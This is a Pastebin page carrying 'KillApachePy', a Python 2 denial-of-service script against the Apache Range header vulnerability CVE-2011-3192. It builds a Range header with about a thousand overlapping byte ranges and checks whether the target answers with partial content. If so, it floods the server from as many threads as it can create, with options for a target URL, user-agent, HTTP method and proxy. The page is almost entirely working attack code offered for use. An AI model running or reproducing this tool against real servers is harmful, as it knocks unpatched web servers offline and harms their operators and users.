API tools faq
paste
infodox

killapache.py

infodox
Nov 30th, 2011
259
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.31 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python
  2.  
  3. import optparse, os, re, socket, threading, time, urllib, urllib2, urlparse
  4.  
  5. NAME        = "KillApachePy (Range Header DoS CVE-2011-3192)"
  6. VERSION     = "0.1d"
  7. AUTHOR      = "Miroslav Stampar (http://unconciousmind.blogspot.com | @stamparm)"
  8. LICENSE     = "Public domain (FREE)"
  9.  
  10. SLEEP_TIME      = 3     # time to wait for new thread slots (after max number reached)
  11. RANGE_NUMBER    = 1024  # number of range subitems forming the DoS payload
  12. USER_AGENT      = "KillApachePy (%s)" % VERSION
  13.  
  14. def attack(url, user_agent=None, method='GET', proxy=None):
  15.     url = ("http://%s" % url) if '://' not in url else url
  16.     host = urlparse.urlparse(url).netloc
  17.  
  18.     if proxy and not re.match('\Ahttp(s)?://[^:]+:[0-9]+(/)?\Z', proxy, re.I):
  19.         print "(x) Invalid proxy address used"
  20.         exit(-1)
  21.  
  22.     proxy_support = urllib2.ProxyHandler({'http': proxy} if proxy else {})
  23.     opener = urllib2.build_opener(proxy_support)
  24.     urllib2.install_opener(opener)
  25.  
  26.     class _MethodRequest(urllib2.Request): # Create any HTTP (e.g. HEAD/PUT/DELETE) request type with urllib2
  27.         def set_method(self, method):
  28.             self.method = method.upper()
  29.  
  30.         def get_method(self):
  31.             return getattr(self, 'method', urllib2.Request.get_method(self))
  32.  
  33.     def _send(check=False): #Send the vulnerable request to the target
  34.         if check:
  35.             print "(i) Checking target for vulnerability..."
  36.         payload = "bytes=0-,%s" % ",".join("5-%d" % item for item in xrange(1, RANGE_NUMBER))
  37.         try:
  38.             headers = { 'Host': host, 'User-Agent': user_agent or USER_AGENT, 'Range': payload, 'Accept-Encoding': 'gzip, deflate' }
  39.             req = _MethodRequest(url, None, headers)
  40.             req.set_method(method)
  41.             response = urllib2.urlopen(req)
  42.             if check:
  43.                 return response and ('byteranges' in repr(response.headers.headers) or response.code == 206)
  44.         except urllib2.URLError, msg:
  45.             if any([item in str(msg) for item in ('Too many', 'Connection reset')]):
  46.                 pass
  47.             elif 'timed out' in str(msg):
  48.                 print "\r(i) Server seems to be choked ('%s')" % msg
  49.             else:
  50.                 print "(x) Connection error ('%s')" % msg
  51.                 if check or 'Forbidden' in str(msg):
  52.                     os._exit(-1)
  53.         except Exception, msg:
  54.             raise
  55.  
  56.     try:
  57.         if not _send(check=True):
  58.             print "(x) Target does not seem to be vulnerable"
  59.         else:
  60.             print "(o) Target seems to be vulnerable\n"
  61.             quit = False
  62.             while not quit:
  63.                 threads = []
  64.                 print "(i) Creating new threads..."
  65.                 try:
  66.                     while True:
  67.                         thread = threading.Thread(target=_send)
  68.                         thread.start()
  69.                         threads.append(thread)
  70.                 except KeyboardInterrupt:
  71.                     quit = True
  72.                     raise
  73.                 except Exception, msg:
  74.                     if 'new thread' in str(msg):
  75.                         print "(i) Maximum number of new threads created (%d)" % len(threads)
  76.                     else:
  77.                         print "(x) Exception occured ('%s')" % msg
  78.                 finally:
  79.                     if not quit:
  80.                         print "(o) Waiting for %d seconds to acquire new threads" % SLEEP_TIME
  81.                         time.sleep(SLEEP_TIME)
  82.                         print
  83.     except KeyboardInterrupt:
  84.         print "\r(x) Ctrl-C was pressed"
  85.         os._exit(1)
  86.  
  87. if __name__ == "__main__":
  88.     print "%s #v%s\n by: %s\n" % (NAME, VERSION, AUTHOR)
  89.     parser = optparse.OptionParser(version=VERSION)
  90.     parser.add_option("-u", dest="url", help="Target url (e.g. \"http://www.target.com/index.php\")")
  91.     parser.add_option("--agent", dest="agent", help="User agent (e.g. \"Mozilla/5.0 (Linux)\")")
  92.     parser.add_option("--method", dest="method", default='GET', help="HTTP method used (default: GET)")
  93.     parser.add_option("--proxy", dest="proxy", help="Proxy (e.g. \"http://127.0.0.1:8118\")")
  94.     options, _ = parser.parse_args()
  95.     if options.url:
  96.         result = attack(options.url, options.agent, options.method, options.proxy)
  97.     else:
  98.         parser.print_help()
  99.  
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!